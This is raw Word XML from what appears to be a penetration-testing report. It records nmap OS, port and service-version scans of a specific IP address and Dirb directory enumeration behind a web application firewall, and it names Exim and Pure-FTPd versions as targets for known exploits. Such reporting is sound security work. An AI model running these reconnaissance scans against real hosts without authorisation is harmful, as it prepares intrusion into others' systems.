    <w:p w14:paraId="5ECFEE81" w14:textId="77777777" w:rsidR="009835A9" w:rsidRDefault="009835A9" w:rsidP="00DE03B6"/>
    <w:p w14:paraId="1AFB45EB" w14:textId="627FE225" w:rsidR="00B44B7E" w:rsidRDefault="005D5993" w:rsidP="005D5993">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc93487283"/>
      <w:bookmarkStart w:id="30" w:name="_Toc93502858"/>
      <w:bookmarkStart w:id="31" w:name="_Toc93526891"/>
      <w:bookmarkStart w:id="32" w:name="_Toc94100220"/>
      <w:r>
        <w:t>Operating System &amp; Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="6F322AA0" w14:textId="4A5D338F" w:rsidR="00497503" w:rsidRPr="003132EA" w:rsidRDefault="00514BE8" w:rsidP="003132EA">
      <w:r>
        <w:t>Nmap was the tool used i</w:t>
      </w:r>
      <w:r w:rsidR="006E674B">
        <w:t xml:space="preserve">n determining the </w:t>
      </w:r>
      <w:r w:rsidR="0088781B">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="006E674B">
        <w:t xml:space="preserve">perating System of the server and other </w:t>
      </w:r>
      <w:r>
        <w:t>essential</w:t>
      </w:r>
      <w:r w:rsidR="00752B03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088781B">
        <w:t xml:space="preserve">information such as the ports opened </w:t>
      </w:r>
      <w:r w:rsidR="00F737FD">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0088781B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B752FD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0088781B">
        <w:t xml:space="preserve">version of the services </w:t>
      </w:r>
      <w:r w:rsidR="005D306B">
        <w:t>running on the server.</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9426C">
        <w:t>It is an open-source tool that</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF">
        <w:t>llows for</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t xml:space="preserve"> network </w:t>
      </w:r>
      <w:r w:rsidR="006A03EF">
        <w:t xml:space="preserve">scans to </w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t xml:space="preserve">discover not only everything connected to </w:t>
      </w:r>
      <w:r w:rsidR="00A64BC0">
        <w:t>the server</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t>, but also a wide variety of information about what</w:t>
      </w:r>
      <w:r w:rsidR="006E0F00">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t xml:space="preserve"> connected, </w:t>
      </w:r>
      <w:r w:rsidR="00451E9F">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006A03EF" w:rsidRPr="006A03EF">
        <w:t>what services each host is operating</w:t>
      </w:r>
      <w:r w:rsidR="00F379FC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50587654" w14:textId="77777777" w:rsidR="00DF40D7" w:rsidRDefault="00DF40D7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192E273" w14:textId="4341DA17" w:rsidR="005F1FEC" w:rsidRDefault="005F1FEC" w:rsidP="005F1FEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Server Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE601B" w14:textId="4BE5D8CE" w:rsidR="00740B63" w:rsidRPr="00740B63" w:rsidRDefault="00740B63" w:rsidP="00740B63">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E04EB" w14:textId="3EF44280" w:rsidR="00F23D91" w:rsidRDefault="00F23D91" w:rsidP="0021361C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Listed below ar</w:t>
      </w:r>
      <w:r w:rsidR="0067043C">
        <w:t xml:space="preserve">e the standard ports that are opened along with the Operating System of the server. Based on the result, </w:t>
      </w:r>
      <w:r w:rsidR="00262A0C">
        <w:t>it is running on Linux</w:t>
      </w:r>
      <w:r w:rsidR="00CF209E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015480F" w14:paraId="1CEAED18" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA9E609" w14:textId="2C52481A" w:rsidR="0015480F" w:rsidRDefault="0015480F" w:rsidP="00E16B00">
            <w:r>
              <w:t xml:space="preserve">sudo nmap -O </w:t>
            </w:r>
            <w:r w:rsidR="00C67765">
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">osscan-guess </w:t>
            </w:r>
            <w:r w:rsidRPr="0084557E">
              <w:t>198.54.115.179</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26BEF515" w14:textId="224D23FE" w:rsidR="0015480F" w:rsidRPr="00F23D91" w:rsidRDefault="0015480F" w:rsidP="00915F21">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4486C550" w14:textId="046A92E1" w:rsidR="005F1FEC" w:rsidRDefault="00C8670D" w:rsidP="001519BE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658250" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F801CFC" wp14:editId="069EA5AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>771432</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1275339</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1184744" cy="77441"/>
                <wp:effectExtent l="0" t="0" r="15875" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="18946399" name="Rectangle 18946399"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1184744" cy="774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066152">
              <v:rect id="Rectangle 18946399" style="position:absolute;margin-left:60.75pt;margin-top:100.4pt;width:93.3pt;height:6.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6F6D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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C233A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FB616FB" wp14:editId="1ED8067E">
            <wp:extent cx="4397071" cy="1698227"/>
            <wp:effectExtent l="0" t="0" r="381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0031" cy="1710957"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F872A" w14:textId="77777777" w:rsidR="00497503" w:rsidRDefault="00497503" w:rsidP="005F1FEC"/>
    <w:p w14:paraId="6DC75D3B" w14:textId="6F011409" w:rsidR="005F1FEC" w:rsidRDefault="005F1FEC" w:rsidP="005F1FEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Opened Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503A706" w14:textId="2814DA81" w:rsidR="000B1456" w:rsidRPr="000B1456" w:rsidRDefault="000B1456" w:rsidP="000B1456">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769D85B" w14:textId="69297851" w:rsidR="00061979" w:rsidRDefault="008C02B7" w:rsidP="0021361C">
      <w:r>
        <w:t xml:space="preserve">As seen below, these are all the opened ports on the server that </w:t>
      </w:r>
      <w:r w:rsidR="5561D569">
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over the standard ports. </w:t>
      </w:r>
      <w:r w:rsidR="00472E9D">
        <w:t xml:space="preserve">An interesting port </w:t>
      </w:r>
      <w:r w:rsidR="003F11AE">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00472E9D">
        <w:t>appear</w:t>
      </w:r>
      <w:r w:rsidR="003F11AE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00472E9D">
        <w:t xml:space="preserve"> to be opened is port 21</w:t>
      </w:r>
      <w:r w:rsidR="003F11AE">
        <w:t xml:space="preserve">. Port 21 </w:t>
      </w:r>
      <w:r w:rsidR="00472E9D">
        <w:t>is used for File Transfer Protocol (FTP).</w:t>
      </w:r>
      <w:r w:rsidR="00A3549F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A1896">
        <w:t>Simple Mail Trans</w:t>
      </w:r>
      <w:r w:rsidR="00D130D7">
        <w:t>fer Protocol (</w:t>
      </w:r>
      <w:r w:rsidR="00A3549F">
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00D130D7">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C96001">
        <w:t xml:space="preserve"> and P</w:t>
      </w:r>
      <w:r w:rsidR="008C1626">
        <w:t>ost Office Protocol 3</w:t>
      </w:r>
      <w:r w:rsidR="00A3549F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0098252E">
        <w:t>(POP3) were</w:t>
      </w:r>
      <w:r w:rsidR="00A3549F">
        <w:t xml:space="preserve"> also opened which </w:t>
      </w:r>
      <w:r w:rsidR="0098252E">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00A3549F">
        <w:t xml:space="preserve"> used for mail exchange.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0084557E" w14:paraId="681F318A" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02829F20" w14:textId="4A50C33E" w:rsidR="0084557E" w:rsidRDefault="0084557E" w:rsidP="00E16B00">
            <w:r>
              <w:t>sudo nmap -</w:t>
            </w:r>
            <w:r w:rsidR="0015480F">
              <w:t>p-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0084557E">
              <w:t>198.54.115.179</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6005ADF2" w14:textId="51154711" w:rsidR="00CF727A" w:rsidRDefault="00CF727A" w:rsidP="001519BE"/>
    <w:p w14:paraId="32C790AA" w14:textId="38542B05" w:rsidR="00287677" w:rsidRDefault="00C8670D" w:rsidP="0021361C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658252" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CEECADB" wp14:editId="24781C96">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1590261</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>404550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1259840" cy="1778249"/>
                <wp:effectExtent l="0" t="0" r="16510" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="18946405" name="Rectangle 18946405"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1259840" cy="17782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6B4B75">
              <v:rect id="Rectangle 18946405" style="position:absolute;margin-left:125.2pt;margin-top:31.85pt;width:99.2pt;height:14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3DBC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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0021361C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316B57B1" wp14:editId="48DFEFD2">
            <wp:extent cx="2759102" cy="2184028"/>
            <wp:effectExtent l="0" t="0" r="3175" b="698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9102" cy="2184028"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FCF44" w14:textId="48610CD6" w:rsidR="005F1FEC" w:rsidRDefault="00135A12" w:rsidP="005F1FEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="005F1FEC">
        <w:t>ervices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7528C" w14:textId="084CAFDC" w:rsidR="000B1456" w:rsidRPr="000B1456" w:rsidRDefault="000B1456" w:rsidP="000B1456">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00452B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12950F" w14:textId="2AF545B5" w:rsidR="00CF727A" w:rsidRDefault="0005216E" w:rsidP="0021361C">
      <w:r>
        <w:t>As listed below, it states the version of each service running on the server.</w:t>
      </w:r>
      <w:r w:rsidR="00B15EBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F07BB">
        <w:t>With the knowledge of</w:t>
      </w:r>
      <w:r w:rsidR="00EC5225">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E91E1E">
        <w:t>each services’</w:t>
      </w:r>
      <w:r w:rsidR="00EC5225">
        <w:t xml:space="preserve"> version, </w:t>
      </w:r>
      <w:r w:rsidR="004E7343">
        <w:t>it can help in</w:t>
      </w:r>
      <w:r w:rsidR="00C1787D">
        <w:t xml:space="preserve"> planning and</w:t>
      </w:r>
      <w:r w:rsidR="004E7343">
        <w:t xml:space="preserve"> exploiting known vulnerabilities for that specific version of the service. For example, Pure-FTPd and Exim smtpd 4.94.2.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015273F" w14:paraId="3DCC872D" w14:textId="77777777" w:rsidTr="0015273F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EE0B6AA" w14:textId="75AF34CF" w:rsidR="0015273F" w:rsidRDefault="0015273F" w:rsidP="00EC425D">
            <w:r>
              <w:t xml:space="preserve">sudo nmap -sV </w:t>
            </w:r>
            <w:r w:rsidR="0084557E" w:rsidRPr="0084557E">
              <w:t>198.54.115.179</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75F30469" w14:textId="4CCF776C" w:rsidR="0015273F" w:rsidRPr="00CF727A" w:rsidRDefault="0015273F" w:rsidP="00EC425D"/>
    <w:p w14:paraId="20336C09" w14:textId="4E255349" w:rsidR="000C233A" w:rsidRDefault="00C8670D" w:rsidP="000C233A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658251" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59A54589" wp14:editId="3ED3E260">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>588065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2866390" cy="766694"/>
                <wp:effectExtent l="0" t="0" r="10160" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="18946404" name="Rectangle 18946404"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2866390" cy="7666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7A8EC5">
              <v:rect id="Rectangle 18946404" style="position:absolute;margin-left:0;margin-top:46.3pt;width:225.7pt;height:60.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9F30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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C233A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104BA2E9" wp14:editId="78CB61F8">
            <wp:extent cx="5943600" cy="169608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6D841F34" w14:textId="77777777" w:rsidR="002F4C33" w:rsidRDefault="002F4C33" w:rsidP="000C233A"/>
    <w:p w14:paraId="5BA21C20" w14:textId="1001598A" w:rsidR="00F81A1B" w:rsidRDefault="004B44BE" w:rsidP="00A87390">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc93487284"/>
      <w:bookmarkStart w:id="34" w:name="_Toc93502859"/>
      <w:bookmarkStart w:id="35" w:name="_Toc93526892"/>
      <w:bookmarkStart w:id="36" w:name="_Toc94100221"/>
      <w:r>
        <w:t>Mapping of Directories &amp; Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="71C8D287" w14:textId="29346B74" w:rsidR="002928E0" w:rsidRDefault="00AC2B8A" w:rsidP="0021361C">
      <w:r>
        <w:t>Information gathered in this section would be documented for future references</w:t>
      </w:r>
      <w:r w:rsidR="000B4EB7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005B3F51">
        <w:t>The information</w:t>
      </w:r>
      <w:r w:rsidR="000B4EB7">
        <w:t xml:space="preserve"> can include links and references to hidden files</w:t>
      </w:r>
      <w:r w:rsidR="00B04385">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="000B4EB7">
        <w:t xml:space="preserve"> directories</w:t>
      </w:r>
      <w:r w:rsidR="00B04385">
        <w:t xml:space="preserve"> on the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411C4C7" w14:textId="77777777" w:rsidR="002F1826" w:rsidRPr="002928E0" w:rsidRDefault="002F1826" w:rsidP="002928E0"/>
    <w:p w14:paraId="67CA3AA2" w14:textId="77777777" w:rsidR="00FB098E" w:rsidRDefault="00FB098E">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc93487285"/>
      <w:bookmarkStart w:id="38" w:name="_Toc93502860"/>
      <w:bookmarkStart w:id="39" w:name="_Toc93526893"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAC739" w14:textId="3FDBA15D" w:rsidR="004C44DA" w:rsidRDefault="004C44DA" w:rsidP="00A87390">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dirb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="322904C3" w14:textId="525AE1EA" w:rsidR="002F4C33" w:rsidRPr="002F4C33" w:rsidRDefault="002F4C33" w:rsidP="002F4C33">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Yi Q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44"/>
      </w:tblGrid>
      <w:tr w:rsidR="007611CC" w14:paraId="34F022D3" w14:textId="77777777" w:rsidTr="00E26D69">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BAC46E9" w14:textId="511A31C5" w:rsidR="00E27856" w:rsidRDefault="00E27856" w:rsidP="00E27856">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F42E47" wp14:editId="2423803B">
                  <wp:extent cx="3047348" cy="2878372"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                  <wp:docPr id="17"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Text&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill rotWithShape="1">
                          <a:blip r:embed="rId46"/>
                          <a:srcRect b="32901"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3102040" cy="2930031"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:extLst>
                            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                            </a:ext>
                          </a:extLst>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B2927FF" w14:textId="51521A7D" w:rsidR="00340ED7" w:rsidRDefault="00FE796E" w:rsidP="006D309F">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dirb is an </w:t>
            </w:r>
            <w:r w:rsidR="00F5040E">
              <w:t>open-source Web Content Scanner that looks for existing</w:t>
            </w:r>
            <w:r w:rsidR="003E0385">
              <w:t xml:space="preserve"> web objects such as hidden files and directories.</w:t>
            </w:r>
            <w:r w:rsidR="00D008ED">
              <w:t xml:space="preserve"> However, due to the web application being protected by a Web Application Firewall, </w:t>
            </w:r>
            <w:r w:rsidR="006442D9">
              <w:t xml:space="preserve">some </w:t>
            </w:r>
            <w:r w:rsidR="009B520E">
              <w:t xml:space="preserve">of the </w:t>
            </w:r>
            <w:r w:rsidR="005A3E09">
              <w:t xml:space="preserve">results </w:t>
            </w:r>
            <w:r w:rsidR="009B520E">
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="005A3E09">
              <w:t xml:space="preserve">re false positive as </w:t>
            </w:r>
            <w:r w:rsidR="00626029">
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="00A11D4F">
              <w:t xml:space="preserve">scanner’s machine was </w:t>
            </w:r>
            <w:r w:rsidR="009E6160">
              <w:t xml:space="preserve">blocked </w:t>
            </w:r>
            <w:r w:rsidR="00C902B8">
              <w:t xml:space="preserve">and a </w:t>
            </w:r>
            <w:r w:rsidR="006A35BF">
              <w:t xml:space="preserve">reCAPTCHA must be done to </w:t>
            </w:r>
            <w:r w:rsidR="00E51FBC">
              <w:t>unblock</w:t>
            </w:r>
            <w:r w:rsidR="00E62D7F">
              <w:t xml:space="preserve"> the machine</w:t>
            </w:r>
            <w:r w:rsidR="009732F5">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C7ACB44" w14:textId="77777777" w:rsidR="003E71DB" w:rsidRDefault="003E71DB" w:rsidP="004C44DA"/>
    <w:p w14:paraId="088062E7" w14:textId="48254142" w:rsidR="00F835E2" w:rsidRDefault="00F835E2" w:rsidP="004C44DA">
      <w:r>
        <w:t xml:space="preserve">Based on the </w:t>
      </w:r>
      <w:r w:rsidR="00B279A4">
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001F2CB5">
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are some notable findings</w:t>
      </w:r>
      <w:r w:rsidR="00D257A0">
        <w:t xml:space="preserve"> that were verified to be positive re</w:t>
      </w:r>
      <w:r w:rsidR="004F5E49">
        <w:t>sults</w:t>
      </w:r>
      <w:r w:rsidR="00762517">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5A20">
        <w:t>especially assets and files</w:t>
      </w:r>
      <w:r w:rsidR="00B519DA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
